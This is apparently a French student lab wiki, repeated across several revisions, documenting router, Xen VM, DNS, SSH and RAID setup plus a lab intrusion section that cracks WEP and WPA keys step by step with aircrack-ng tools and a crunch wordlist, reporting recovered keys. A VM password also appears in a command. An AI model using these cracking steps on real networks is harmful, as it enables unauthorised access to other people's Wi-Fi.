Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 1H<br />
@ IN SOA ns.anosteke59.site (<br />
12 ; serial number YYMMDDNN<br />
1H ; Refresh<br />
1H ; Retry<br />
1D ; Expire<br />
1H ; Min TTL<br />
)<br />
IN NS ns.anosteke59.site.<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME WWW<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
=== Tests d’intrusion ===<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57694TP sysres IMA5 2021/2022 G72022-01-10T15:57:47Z<p>Avercaem : /* Sécurisation de données */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 1H<br />
@ IN SOA ns.anosteke59.site (<br />
12 ; serial number YYMMDDNN<br />
1H ; Refresh<br />
1H ; Retry<br />
1D ; Expire<br />
1H ; Min TTL<br />
)<br />
IN NS ns.anosteke59.site.<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME WWW<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
=== Tests d’intrusion ===<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57688TP sysres IMA5 2021/2022 G72022-01-10T15:53:05Z<p>Avercaem : /* Sécurisation de données */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 1H<br />
@ IN SOA ns.anosteke59.site (<br />
12 ; serial number YYMMDDNN<br />
1H ; Refresh<br />
1H ; Retry<br />
1D ; Expire<br />
1H ; Min TTL<br />
)<br />
IN NS ns.anosteke59.site.<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME WWW<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Tests d’intrusion ===<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57687TP sysres IMA5 2021/2022 G72022-01-10T15:52:52Z<p>Avercaem : /* Sécurisation de données */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
